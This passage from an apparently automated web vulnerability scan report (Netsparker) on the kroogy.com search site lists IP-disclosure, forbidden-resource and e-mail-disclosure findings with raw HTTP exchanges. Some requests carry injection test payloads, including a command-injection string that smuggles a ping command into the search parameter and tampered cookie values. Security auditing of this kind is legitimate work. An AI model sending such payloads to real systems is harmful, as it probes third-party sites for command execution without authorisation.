First ensure that this is not a false positive. Due to the nature of the issue. Netsparker could not confirm that this IP address was actually the real internal IP address of the target web server or internal network. If it is then consider removing it.
- /search/web

/search/web

http://kroogy.com/search/web?search=%27%26+ping+-n+26+127.0.0.1+%26&type=web&fl=0

Parameters

Parameter Type Value
search GET '& ping -n 26 127.0.0.1 &
type GET web
fl GET 0

Extracted IP Address(es)

Request

GET /search/web?search=%27%26+ping+-n+26+127.0.0.1+%26&type=web&fl=0 HTTP/1.1
Referer: http://kroogy.com/search/redir
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: language=8; region=AU-en; nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; region=%27%2BNSFTW%2B%27; PHPSESSID=totjukp6oqa5l5opadu8gndj05; language=%2A%2Fnetsparker%280x000055%29%3B%2F%2A; theme=%27%2BNSFTW%2B%27
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:05:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 9129
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - &#039;&amp; ping -n 26 127.0.0.1 &amp;</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - &#039;&amp; ping -n 26 127.0.0.1 &amp;"><meta name="keywords" content="Kroogy Search,search,search engine,&#039;&amp; ping -n 26 127.0.0.1 &amp;,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > &nbsp;பெருவிரல்சுவடை காமி
&nbsp;&nbsp; <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> &nbsp;உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!---->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; } else { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; } }}function GetXmlHttpObject(){if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); }if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); }return null;}function setvaluefortb(text){ document.getElementById('search').value=text; document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.searchform.submit();}document.body.onclick= getMouseXY;function getMouseXY(e) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px";}var searchtext="";var counter=0;var old_char_count=0;var total_result_count=10;function keymovement(evt,textval) { var charCode = (evt.which) ? evt.which : event.keyCode //alert(charCode); if(charCode==40) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter+1; if(!document.getElementById('livesearch_a_'+counter)) { counter=0; } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==38) { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padding="0px"; counter=counter-1; if(!document.getElementById('livesearch_a_'+counter) && counter!=0) { for(i=total_result_count;i>0;i--) { if(document.getElementById('livesearch_a_'+i)) { counter=i; break; } } } for(i=1;i<=total_result_count;i++) { if(document.getElementById('livesearch_a_'+i)) { document.getElementById('livesearch_a_'+i).style.background="#fff"; } } if(document.getElementById('livesearch_a_'+counter)) { document.getElementById('livesearch_a_'+counter).style.background="#ccc"; document.getElementById('search').value=document.getElementById('livesearch_h_'+counter).value; } else { document.getElementById('search').value=searchtext; } } else if(charCode==37 || charCode==39 || charCode==17 || charCode==18) { } else if(charCode==27 ) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; document.getElementById('search').value=searchtext; } else if(charCode==13 ) { document.searchform.submit(); } else { searchtext=document.getElementById('search').value; showResult(textval); } }</script><style type="text/css"></style><form name="searchform" id="searchform" enctype="multipart/form-data" method="POST" action="http://kroogy.com/search/redir"><div class="containerdiv"><table cellpadding="0 " cellspacing="0" class="containertable"><tr><td class="containertabtd"><div class="tabsdiv"><div class="tabsdivinner"><table cellpadding="0" cellspacing="0" class="tabstable"><tr class="tabstr"> <td class="activetableft">&nbsp;</td> <td nowrap="nowrap" class="activetabcenter"><a class="activetablink" href="javascript:Determine('web','1');"><span>வலை</span></a></td> <td class="activetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('images','0');"><span>படம்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('videos','0');"><span>ஒளி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('news','0');"><span>செய்தி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('sports','0');"><span>விளையாட்டு</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Audio','0');"><span>ஒலி</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Forum','0');"><span>போரும்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Blog','0');"><span>இடுகை</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Wiki','0');"><span>விக்கிபீடியா</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('PDF','0');"><span>பிடியஃப்</span></a></td> <td class="inactivetabright">&nbsp;</td> <td class="inactivetableft">&nbsp;</td> <td nowrap="nowrap" class="inactivetabcenter"><a class="inactivetablink" href="javascript:Determine('Amazon','0');"><span>Amazon</span></a></td> <td class="inactivetabright">&nbsp;</td></tr></table></div></div></td></tr><tr><td class="containersearchtd"><div class="searchdiv"><table cellpadding="0" cellspacing="0" class="searchtable" border="0"><tr><td class="searchtdleft">&nbsp;</td><td nowrap="nowrap" class="searchtdcenter" dir="ltr"><table cellpadding="0" cellspacing="0"><tr><td colspan="3" > <span class="searchfieldspan"><input type="hidden" name="type" value="web"><input autocomplete="off" onKeyUp="javascript:keymovement(event,this.value);" name="search" id="search" type="text" value="&#039;&amp; ping -n 26 127.0.0.1 &amp;" size="50" class="searchfield"></span><span class="searchbuttonspan"><input type="submit" name="searchbutton" value="தேடு" class="searchbutton"></span><span class="luckybuttonspan"><input type="submit" name="lucky" value="அதிர்ஷ்டம் என் பக்கம்" class="luckybutton"></span></td></tr><tr><td style="overflow:visible; width:380px;" valign="top" ><div id="livesearch" class="livesearch" ></div></td><td>&nbsp;</td><td>&nbsp;</td></tr></table></td><td class="searchtdright">&nbsp;</td></tr></table></div></td></tr></table></div></form> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> <script language="javascript"> document.getElementById("livesearch").style.display="none";</script> </td> </tr></table><table cellpadding="0" cellspacing="0" border="0" class="outermaincontainer"> <tr> <td colspan="2"> <table border="0" cellpadding="0" cellspacing="0" class="totaltable"> <tr> <td class="totaltd" align="left"><span class="totaltext">க்கான ஏறக்குறைய <span class="totalresults">180,000</span> இல் <span class="resultcountstart">1</span>-<span class="resultcountend">10</span> முடிவுகள்</span></td> <td class="typesearchtd" align="right"><span class="typesearchtext">தேடு வலை</span></td> </tr> <..
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /userdata/

/userdata/ CONFIRMED

http://kroogy.com/userdata/

Request

GET /userdata/ HTTP/1.1
Referer: http://kroogy.com/userdata/homepagelogo.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Sun, 24 Apr 2011 12:34:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 15 Apr 2011 17:16:02 GMT
ETag: "800510-3bb-4a0f8323c7880"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding:
X-Powered-By: PleskLin
Content-Length: 548
Connection: close
Content-Type: text/html


<HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY><H1>Forbidden</H1>You do not have permission to access this document.<P><HR><ADDRESS>Web Server at kroogy.com</ADDRESS></BODY></HTML><!-- - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /search/web

/search/web

http://kroogy.com/search/web?search=ls+portal&type=web

Found E-mails

team@gmail.com

Request

GET /search/web?search=ls+portal&type=web HTTP/1.1
Referer: http://kroogy.com/search/web/LS%20magazine
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: kroogy.com
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; language=8; region=BE-nl; PHPSESSID=totjukp6oqa5l5opadu8gndj05
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:36:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6,PleskLin
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 10699
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><SCRIPT LANGUAGE="JavaScript">function showcheckbox(){ if(document.getElementById('thumbshotcheck').checked==true) { SetCookie( 'thumbshot', 'on', 7); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display=""; } } else { SetCookie( 'thumbshot', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("thumbshot"+i).style.display="none"; }}}function showcheckbox1(){if(document.getElementById('quicklookcheck').checked==true) { SetCookie( 'qlook', 'on', 7); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display=""; document.getElementById("qlookframe"+i).style.display=""; } } else { SetCookie( 'qlook', 'off', 7 ); for(i=0;i<10;i++) { document.getElementById("qlook"+i).style.display="none"; document.getElementById("qlookframe"+i).style.display="none"; }}}</script><title>Kroogy Search - வலை - ls portal</title><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><meta name="description" content="Kroogy Search - வலை - ls portal"><meta name="keywords" content="Kroogy Search,search,search engine,ls portal,web"><style type="text/css"><!--body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px;}--></style></head><body><table cellpadding="0" cellspacing="0" border="0" class="headertable" width="100%"><tr><td class="headerlinkstd" align="right"><span style="float:left;"><form name="displaysettings" id="displaysettings" enctype="multipart/form-data" method="post" action="http://kroogy.com/"> <input type="checkbox" name="thumbshotcheck" id="thumbshotcheck" checked="checked" onchange="javascript:showcheckbox()" > &nbsp;பெருவிரல்சுவடை காமி
&nbsp;&nbsp; <input type="checkbox" name="quicklookcheck" id="quicklookcheck" checked="checked" onchange="javascript:showcheckbox1()"> &nbsp;உள்பார்வை காமி </form></span><a class="headerlink" href="http://kroogy.com/index/advanced">மேம்பட்ட தேடல்</a> | <a class="headerlink" href="http://kroogy.com/">Kroogy Search முகப்பு</a></td></tr><tr><td><style><!--.totaltd
{
border-bottom:#045c97;
border-bottom-style:solid;
border-bottom-width:1px;
background-color:#e4f2fc;
height:20px;
padding-left:10px;
padding-right:10px;

}
.typesearchtd
{
border-bottom:#045c97;
border-bottom-style:solid;
border-bottom-width:1px;
background-color:#e4f2fc;
height:20px;
padding-left:10px;
padding-right:10px;

}
.conversiontable
{
width:100%;
}
.conversiontd
{
padding-left:10px;
padding-right:10px;
padding-bottom:20px;
}
.conversionkeyword
{
font-size:18px;
font-style:italic;
}
.conversiontarget
{
font-size:18px;
font-style:italic;
}


.viewmorelinktd
{
padding-bottom:15px;
}
.viewmorelink
{
font-size:12px;
}
.showimagetd
{
padding-bottom:5px;
}

.imagepreviewlinkweb
{
font-size:12px;
}

.resultcountstart
{
font-size:13px;
font-weight:bold;
}

.resultcountend
{
font-size:13px;
font-weight:bold;
}
.totalresults
{
font-size:13px;
font-weight:bold;
}
.keywordintotal
{
font-size:13px;
font-weight:bold;
}


.thumbshotimage
{
border: 1px solid black;

}

.outermaincontainer
{
align:center;
width:100%;
}

.outermainresulttd
{
vertical-align:top;
width:850px;
padding:10px;
}
outermainimageresulttd
{
vertical-align:top;
width:100%;
padding:10px;
}
.totaltable
{
width:100%;
height:30px;
padding-left:0px;
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.totaltext
{

font-size:12px;


}
.typesearchtext
{
text-transform: capitalize;
font-size:12px;
font-weight:bold;
}
.spelltable
{
height:30px;
width:100%;
font-family:Verdana, Arial, Helvetica, sans-serif;
padding:20px;
}
.spellsuggestiontext
{
padding-left:10px;
padding-right:10px;
font-size:13px;
font-weight:bold;

}
.spelllink
{
font-weight:bold;
font-size:13px;
color:green;
}
.resultsetwrapper
{
width:100%;
}
.resultsetwrappertd
{

}
.resulttable
{
width:100%;
}
.thumbshotimage
{
width:100px;
heigth:100px;
}
.resulttd
{
width:100%;
valign:top;
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.resulttitle
{
font-size:13px;
valign:top;
font-family:verdana,Arial, Helvetica, sans-serif;
}
.resulttitle a:hover
{
color:red;
}
.resultlink
{

}
.newwindowimage
{
width:11px;
height:11px;
}
.resultdescription
{
font-size:11px;
}
.resulturl
{
font-size:12px;
color:green;
}
.emailfrndlink
{
font-size:12px;
}
.seperationtd
{
height:10px;
}
.footerpagetable
{
width:100%;
}
.relatedkeywordstable
{
width:100%;
}

.footerpagetd a
{
text-decoration:none;
font-size:14px;
color:#0368ab;
border-style:solid;
border-width:1px;
border-color:#a4d7fa;
padding-left:8px;
padding-right:8px;
padding-top:2px;
padding-bottom:2px;
font-family:Arial, Helvetica, sans-serif;
}
.footerpagetd a:hover
{
text-decoration:none;
font-size:14px;
color:#fff;
border-style:solid;
border-width:1px;
border-color:#a4d7fa;
padding-left:8px;
padding-right:8px;
padding-top:2px;
padding-bottom:2px;
background-color:#0368ab;
}


.footerpagetext
{
font-size:15px;
color:black;
font-weight:bold;
}
.footerpagetd
{
padding:10px;
height:40px;


}
.relatedkeywordstd
{
height:40px;
padding-left:10px;
padding-right:10px;
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.relatedkeywordmessage
{
font-size:12px;
font-weight:bold;
}
.relatedkeywordlink
{
font-size:12px;
font-weight:bold;
}

.imagedomain
{

font-size:10px;
color:green;
line-height:15px;
}
.imagedetails
{

font-size:10px;
line-height:15px;
font
}
.imagetitle
{

font-size:11px;
line-height:25px;
}
.imagepreview
{
font-size:11px;
}
.imageresulttd
{
padding-left:10px;
padding-bottom:15px;
padding-right:10px;
font-family:Verdana;
}

.videoresulttd
{
padding-bottom:15px;
padding-left:10px;
padding-right:10px;
font-family:Verdana;
}
.videotitle
{

font-size:11px;
line-height:20px;
font-weight:bold;

}
.videoduration
{
font-size:10px;
color:green;
line-height:15px;
}
.videopublishedon
{
font-size:10px;
line-height:15px;
}
.thumbshottd
{
padding-bottom:5px;
padding-right:10px;
vertical-align:top;
padding-left:10px;
}

.imageresultsinwebtd
{
padding-left:10px;
vertical-align:bottom;

}
.imageresultinweb
{
border: 1px solid black;
max-height:80px;
}
.imageresultinwebviewmorelink
{
font-size:12px;
font-weight:bold;
}
.arithmeticconversiontd
{
padding-left:10px;
padding-right:10px;
padding-top:10px;
font-size:14px;
font-weight:bold;
}
.qlook
{
font-size:12px;
}

.emaillinkimage
{
width:12px;
height:12px;
}
.arithmeticconversionkeyword
{
font-size:16px;
font-weight:bold;
}

.arithmeticcoversionresult
{
font-size:16px;
font-weight:bold;

}

.noresulttext
{
font-size:12px;
font-weight:bold;

}
.noresulttd
{
padding-top:15px;
padding-left:15px;
align-text:center;
padding-right:15px;
}
.quicklooktd
{
padding-left:10px;
}
.imageresultinwebviewmorelinktd
{
padding-bottom:15px;
padding-left:10px;
padding-right:10px;
}
.outermainadtd
{
padding-top:20px;
padding-left:10px;
padding-right:10px;
vertical-align:top;
}

.amazonnavigationoptiontext
{

font-size:12px;
font-weight:bold;

}
.amazoncountrytd
{
padding-top:10px;
}
.amazoncategorytd
{
padding-top:10px;
}

.ebaythumbshotimage
{
border: 1px solid black;
width:80px;
}

.amazonthumbshotimage
{
width:55px;
border: 1px solid black;
}
.box
{
background-color: #F0F8FF;
}
.border
{
border-left-color: #d3e1f9;
border-right-color: #d3e1f9;
}/* CSS Document */

.body td, tr
{
font-family:Verdana, Arial, Helvetica, sans-serif;
}

#countries,#optionallanguage,#themegroup
{
background-color:#e4f2fc;
height:22px;
border-width:1px;
border-style:solid;
Border-color:#aaaaaa;

}

.advancedsearchsubtitletd
{
padding-bottom:15px;
padding-top:10px;
padding-left:5px;
padding-right:5px;
}
.advancedsearchtexttd
{
width:250px;
padding-left:5px;
height:40px;
padding-right:5px;

}
.advancedsearchfieldtd
{
padding-bottom:15px;
}
.advancedsearchtextstyle
{
font-size:12px;

}
.advancedsearchtable
{
width:700px;
margin-top:10px;
padding-top:5px;
padding-bottom:15px;

}
.advancedsearchexampletext
{
font-size:12px;
}

.advancedsearchtitletable
{
width:700px;
margin-top:20px;
background-color:#e1e1e1;
padding-top:15px;
padding-bottom:15px;
}
.advancedsearchtitletd
{
padding-left:5px;
height:30px;
text-align:center;
background-color:#e4f2fc;
width:100%;
border:#045c97;
border-style: solid;
border-width: 1px;


}

.advancedsearchsubtitletext
{
font-size:12px;
font-weight:bold;
}

.footertable
{
width:100%;
padding-top:15px;


}
.footertext
{
font-size:12px;
}
.footertd
{
padding-left:10px;
}
.headerlinkstd
{
width:100%;

padding-right:5px;
padding-left:5px;
padding-top:2px;
font-size:13px;
padding-bottom:2px;
border-bottom:#045c97;
background-color: #e4f2fc;
border-bottom-style: solid;
border-bottom-width: 1px;
}

.headerlinkstd a ,.headerlinkstd a:visited
{
color:#000000;
font-weight:bold;
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size:11px;

}

.languagetd
{
padding-left:5px;
font-size:12px;
height:30px;
}
.headerlink
{
font-size:12px;
}
.themetd
{
padding-left:5px;
padding-top:2px;
font-size:13px;
padding-bottom:2px;
border-bottom:#045c97;
background-color: #e4f2fc;
border-bottom-style: solid;
border-bottom-width: 1px;
color:#000;

}
.cloudtagtd
{
margin-top:20px;
padding-top:5px;
padding-left:5px;
border-color:#77c3fa;
border-width:1px;
border-style:solid;
padding-bottom:5px;

padding-left:5px;
padding-right:5px;

}

.cloudtagtd a
{
font-family:Verdana, Arial, Helvetica, sans-serif;
}
.generallinks
{
font-size:12px;
}
.opendirectorytd
{
padding-top:10px;
}
.advancetd
{
height:20px;
padding-left:5px;
font-size:13px;
}

.footerlinktd
{
height:15px;
border-top: #045c97;
padding-top:5px;

border-top-style: solid;
border-top-width: 1px;
}
.stdpagetitle
{
font-size:14px;
font-weight:bold;

}
.emailafrndurltd , .emaillinkdesctd
{
padding-top;5px;
background-color:#e4f2fc;
padding-bottom:5px;
}
.emailafrndurl
{
font-size:12px;
font-weight:bold;
}
.outermainoptionstd
{
padding-left:15px;
padding-right:15px;
padding-top:5px;
padding-bottom:5px;
font-size:12px;
background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;

}
.outermainlogotd
{
width:5%;
padding-top:5px;
padding-bottom:5px;
padding-left:15px;
padding-right:15px;

background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;
}
.outermaintabtd
{

padding-top:10px;
padding-bottom:5px;
padding-left:0px;
padding-right:0px;
vertical-align:bottom;


background: url(images/themes/modern_blue/box.gif);
background-position:bottom;
background-repeat:repeat-x;
}
#mandatory
{
color:red;
font-size:10px;
font-weight:bold;
vertical-align:top;
padding-left:2px;
padding-right:2px;
}
#morelanguagesdiv
{
font-size:11px;
}
.advancetd a
{

font-size:11px;

}



.generatesearchboxtable
{
width:900px;
margin-top:10px;
padding-top:5px;
padding-bottom:15px;

}


.generatesearchboxtitletd
{
padding-left:5px;
height:30px;
text-align:center;
background-color:#e4f2fc;
width:100%;
border:#045c97;
border-style: solid;
border-width: 1px;


}

.generatesearchboxpagetitle
{
font-size:14px;
font-weight:bold;

}


.generatesearchboxtexttd
{

padding-left:5px;
height:40px;
padding-right:5px;

}
.generatesearchboxtextstyle
{
font-size:12px;

}


.generatesearchboxsubtitletd
{
padding-bottom:15px;
padding-top:10px;
padding-left:5px;
padding-right:5px;
}

.generatesearchboxsubtitletext
{
font-size:12px;

font-weight:bold;


}


.generatesearchboxenginestextstyle
{
font-size:12px;
text-transform: capitalize;

}
-->.links{font-size:11px;color: grey;width: 125px;}.outermainadtd1{padding-top:10px;padding-left:0px;padding-right:10px;vertical-align:top;}.resultsetwrappertd{padding-right:50px;}</style><script src="js/qlook.js" language="JavaScript"></script><SCRIPT LANGUAGE="JavaScript">function SetCookie(cookieName,cookieValue,nDays) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires="+expire.toGMTString();}function urlencode(str){return escape(str).replace(/\+/g,'%2B').replace(/%20/g, '+').replace(/\*/g, '%2A').replace(/\//g, '%2F').replace(/@/g, '%40');}function popUp(URL){day = new Date();id = day.getTime();var returnurl="http://kroogy.com/search/emailafriend?url="+urlencode(URL);eval("page" + id + " = window.open(returnurl, '" + id + "', 'toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=605,height=400,left = 520,top = 150');");}</script><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr> <td align="left" class="outermainlogotd" ><a alt="Kroogy Search முகப்பு" title="Kroogy Search முகப்பு" href="http://kroogy.com/"> <img src="userdata/resultpagelogo.jpg" border="0"> </a></td> <td align="left" class="outermaintabtd"><script language="javascript"> function Determine(type,status){var term=document.getElementById('search').value;term=term.replace(/%/g, "%25");term=term.replace(/&/g, "%26");term=term.replace(/\+/g, "%2B");term=term.replace(/\//g, "%2F");term=term.replace(/#/g, "%23");if(term!=""){window.location="index.php?page=search/redir&type="+type+"&search="+term;}if(status=="0" && term=="")window.location="index.php?type="+type; }</script><script type="text/javascript">// JavaScript Documentvar xmlhttp;function showResult(str){ if (str.length==0) { document.getElementById('livesearch').style.display="none"; document.getElementById("livesearch").innerHTML=""; document.getElementById("livesearch").style.border="0px"; document.getElementById("livesearch").style.padding="0px"; return; }xmlhttp=GetXmlHttpObject()if (xmlhttp==null) { alert ("Your browser does not support XML HTTP Request"); return; } document.getElementById("livesearch").style.padding="0px";type=document.searchform.type.value;var url="http://kroogy.com/index/livesearch";url=url+"&q="+str;url=url+"&type="+type;xmlhttp.onreadystatechange=stateChanged ;xmlhttp.open("GET",url,true);xmlhttp.send(null);}function stateChanged(){ if (xmlhttp.readyState==4) { document.getElementById("livesearch").innerHTML=xmlhttp.responseText; if(xmlhttp.responseText!="") { document.getElementById('livesearch').style.display=""; document.getElementById("livesearch").style.border="1px solid #A5ACB2"; document.getElementById("livesearch").style.padd..
Redirect Response BODY Is Too Large

